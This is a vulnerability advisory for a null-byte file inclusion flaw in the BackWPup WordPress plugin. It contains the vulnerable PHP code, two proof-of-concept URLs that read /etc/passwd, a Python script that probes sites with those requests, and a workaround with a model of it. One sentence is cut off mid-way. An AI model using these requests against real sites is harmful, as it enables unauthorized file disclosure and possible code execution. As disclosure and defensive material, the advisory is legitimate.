
[Full-disclosure] BackWPup Wordpress plugin <= 1.4.0 File content disclosure



=============================================
- Release date: Feb 28th, 2011
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for WordPress.
The plugin provides:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check/Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
 
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and possibly earlier versions) passes an unfiltered
request parameter to the filesystem in two PHP pages, which lets a remote
user read sensitive files such as /etc/passwd.
No authentication is required, and the plugin does not even need to be
activated: the two pages are requested directly under wp-content/plugins/.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the PHP pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.

Both files start by including wp-load.php from the directory named by the
wpabs parameter, so a direct request to either page controls the path that
is handed to file_exists() and require_once().

options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile']))
{
    require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...

options-runnow-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and is_numeric(trim($_GET['jobid']))) {
    require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...

Inserting a string terminator (%00) in the wpabs parameter makes it possible
to name a file instead of a directory and have that file included in the page.
This works because PHP releases before 5.3.4 pass the path to the C library as
a NUL-terminated string, so both file_exists() and require_once() see
"/etc/passwd\0wp-load.php" as "/etc/passwd": the existence check passes and
the file is included and echoed to the response.
NOTE: also the 

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed against a Unix machine that
hosts WordPress with the vulnerable plugin.

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1

http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd

Both of them will display the /etc/passwd file. The second parameter in each
URL satisfies the other half of the condition guarding the include: jobid
must be numeric, and logfile must name a file that exists (here simply the
same file).
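The two requests above can be scripted so that an administrator can check a site
for this issue. The following is an added example and is not code from the
advisory or from the plugin; the request timeout, the User-Agent string and the
response heuristic (a passwd-style "root:" line at the start of a line) are this
example's own assumptions.

```python
"""Probe a WordPress site for the BackWPup <= 1.4.0 wpabs null-byte issue.

Added example, not the plugin's or the advisory's own code. The heuristic
used to recognise a disclosed /etc/passwd is an assumption of this script.
"""
import re
import sys
from urllib.error import HTTPError, URLError
from urllib.parse import quote
from urllib.request import Request, urlopen

PLUGIN_APP = "wp-content/plugins/backwpup/app/"


def build_poc_urls(base_url: str, target: str = "/etc/passwd") -> dict:
    """Return the two advisory URLs for a given site and target file.

    The runnow page needs a numeric jobid, the view_log page needs a logfile
    that file_exists() accepts, so it is pointed at the same target file.
    """
    base = base_url.rstrip("/") + "/" + PLUGIN_APP
    # quote() encodes the embedded NUL as %00; PHP < 5.3.4 cuts the path
    # there, so "<target>\0wp-load.php" is opened as "<target>".
    wpabs = quote(target + "\x00", safe="/")
    return {
        "options-runnow-iframe.php":
            f"{base}options-runnow-iframe.php?wpabs={wpabs}&jobid=1",
        "options-view_log-iframe.php":
            f"{base}options-view_log-iframe.php?wpabs={wpabs}"
            f"&logfile={quote(target, safe='/')}",
    }


# A Unix passwd entry for root: name:passwd:uid:gid:... with uid and gid 0.
PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def looks_like_passwd(body: str) -> bool:
    """True if the response body contains a root passwd entry."""
    return PASSWD_LINE.search(body) is not None


def fetch(url: str, timeout: float = 10.0) -> str:
    req = Request(url, headers={"User-Agent": "backwpup-wpabs-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        # The script may hit a PHP fatal error after the include and answer
        # with a 500 that still carries the disclosed content, so keep it.
        return err.read().decode("utf-8", "replace")


def check_site(base_url: str) -> dict:
    """Map each affected script to True (content came back), False (it did
    not) or None (site unreachable, undecided)."""
    results = {}
    for script, url in build_poc_urls(base_url).items():
        try:
            results[script] = looks_like_passwd(fetch(url))
        except (URLError, OSError):
            results[script] = None
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: check.py http://<wordpress_site>/")
    for script, hit in check_site(sys.argv[1]).items():
        state = {True: "VULNERABLE", False: "not confirmed", None: "error"}[hit]
        print(f"{script}: {state}")
```

A negative result only means the /etc/passwd heuristic did not match; a site
running PHP 5.3.4 or later is not exploitable through the null byte even with
the vulnerable plugin installed, and a target behind a WAF may filter %00.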

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file
readable by the web application server user. Because the file is pulled in
through require_once(), a file that contains PHP code would be executed in the
web server's context rather than displayed.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions < 1.4.0 may also be vulnerable (not verified).
Version 1.4.1, released by the vendor after notification, is the fixed release.

VIII. SOLUTION
-------------------------
Upgrade to 1.4.1 or a later release. As a quick workaround, wrap every use of
$_GET['wpabs'] in a trim() call, like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and
file_exists($_GET['logfile'])) {

trim()'s default character mask includes the NUL byte, so a value ending in
%00 no longer truncates the path. Note however that trim() only strips leading
and trailing characters: a value such as /etc/passwd%00x keeps its embedded
NUL and is still cut there by older PHP. A more robust workaround rejects any
wpabs value that contains a NUL byte anywhere, and the proper fix is to stop
reading the WordPress root from the request at all and locate wp-load.php
relative to the script's own path.
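To make the limits of the trim() workaround concrete, the following added
example models in Python how the wpabs value reaches the filesystem in the two
affected scripts. It is not the plugin's code: php_legacy_path() is a
constructed model of PHP < 5.3.4 cutting a path at its first NUL byte,
php_trim() mirrors PHP's default trim() mask, and the expected_root check in
is_valid_wpabs() is this example's own suggested validation.

```python
"""Model of the wpabs -> require_once() path handling and of the trim()
workaround. Added example; php_legacy_path() is a constructed model of the
pre-5.3.4 PHP behaviour, not PHP itself."""
import os

# Default character mask of PHP's trim(): space, \t, \n, \r, \0 and \x0B.
PHP_TRIM_CHARS = " \t\n\r\0\x0b"


def php_trim(s: str) -> str:
    """PHP trim() with its default mask: strips only the ends of the string."""
    return s.strip(PHP_TRIM_CHARS)


def php_legacy_path(path: str) -> str:
    """Path as seen by file_exists()/require_once() on PHP < 5.3.4: the
    string is handed to C as NUL-terminated, so it ends at the first NUL."""
    nul = path.find("\0")
    return path if nul < 0 else path[:nul]


def included_file(wpabs: str, workaround: bool = False) -> str:
    """File that require_once($wpabs.'wp-load.php') actually opens, with or
    without the advisory's trim() workaround applied to $wpabs."""
    if workaround:
        wpabs = php_trim(wpabs)
    return php_legacy_path(wpabs + "wp-load.php")


def is_valid_wpabs(wpabs: str, expected_root: str) -> bool:
    """Stricter check (this example's suggestion): no NUL byte anywhere, and
    the value must name exactly the one directory wp-load.php may come from.
    normpath() is used so that "/root/../root/" style values are compared
    after resolution; no filesystem access is needed."""
    if "\0" in wpabs:
        return False
    return os.path.normpath(wpabs) == os.path.normpath(expected_root)


if __name__ == "__main__":
    cases = ["/var/www/html/", "/etc/passwd\0", "/etc/passwd\0x"]
    for value in cases:
        print(f"{value!r:22} raw -> {included_file(value)!r:28} "
              f"trim -> {included_file(value, workaround=True)!r:28} "
              f"valid -> {is_valid_wpabs(value, '/var/www/html')}")
```

Run stand-alone, the table shows the three outcomes that matter: the legitimate
value opens /var/www/html/wp-load.php, the advisory's %00 payload is defeated by
trim() (the path becomes /etc/passwdwp-load.php, which does not exist), and the
%00x variant survives trim() and is still cut to /etc/passwd. Only the NUL
rejection plus root comparison turns down all three attacker values.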

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this  
information.



      